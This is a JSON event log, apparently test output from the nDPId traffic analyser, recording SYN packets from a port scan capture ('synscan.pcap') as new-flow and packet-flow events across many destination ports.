-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsBbYAADAGEr2sEAAIQA2GNIzTJyjdU4MZAAAAAGACBAANZAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs6H4AACYGOfSsEAAIQA2GNIzTBGHdU4MZAAAAAGACDAAoKwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdMIAACoGqbCsEAAIQA2GNIzTIsPdU4MZAAAAAGACDAAJyQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8wAACUGy6asEAAIQA2GNIzTBPjdU4MZAAAAAGACCAArlAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdhoAADUGnVisEAAIQA2GNIzSCIPdUoMYAAAAAGACCAAoDAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nIAACcGKwCsEAAIQA2GNIzSE9\/dUoMYAAAAAGACEAAUsAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsjegAADcGg4qsEAAIQA2GNIzSrZrdUoMYAAAAAGACEAB69AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsNycAADcG2kusEAAIQA2GNIzSAavdUoMYAAAAAGACEAAm5AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjgAACsGpzqsEAAIQA2GNIzSD6TdUoMYAAAAAGACEAAY6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs334AACgGQPSsEAAIQA2GNIzSCVrdUoMYAAAAAGACBAArNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdPQAADkGmn6sEAAIQA2GNIzSF0DdUoMYAAAAAGACCAAZTwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsZEIAADgGrDCsEAAIQA2GNIzSCjDdUoMYAAAAAGACBAAqXwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsnDoAADUGdzisEAAIQA2GNIzSAcrdUoMYAAAAAGACCAAuxQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AsAADkGM2esEAAIQA2GNIzSBCzdUoMYAAAAAGACCAAsYwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsqx8AACoGc1OsEAAIQA2GNIzSBqTdUoMYAAAAAGACDAAl6wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsIRsAACkG\/lesEAAIQA2GNIzSArPdUoMYAAAAAGACCAAt3AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsTGQAACcG1Q6sEAAIQA2GNIzSFxbdUoMYAAAAAGACEAAReQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsspgAACoGa9qsEAAIQA2GNIzSI4\/dUoMYAAAAAGACDAAJAAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AADgGQ0OsEAAIQA2GNIzTgAHdU4MZAAAAAGACBAC0igAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHEAADUGawGsEAAIQA2GNIzTAsfdU4MZAAAAAGACCAAtxQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsdBIAADgGnGCsEAAIQA2GNIzTB\/ndU4MZAAAAAGACBAAskwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsSU4AADMGzCSsEAAIQA2GNIzTBErdU4MZAAAAAGACEAAkQgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE4AADMGDSWsEAAIQA2GNIzTDd\/dU4MZAAAAAGACEAAarQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf4AACgG+nSsEAAIQA2GNIzTG3HdU4MZAAAAAGACBAAZGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 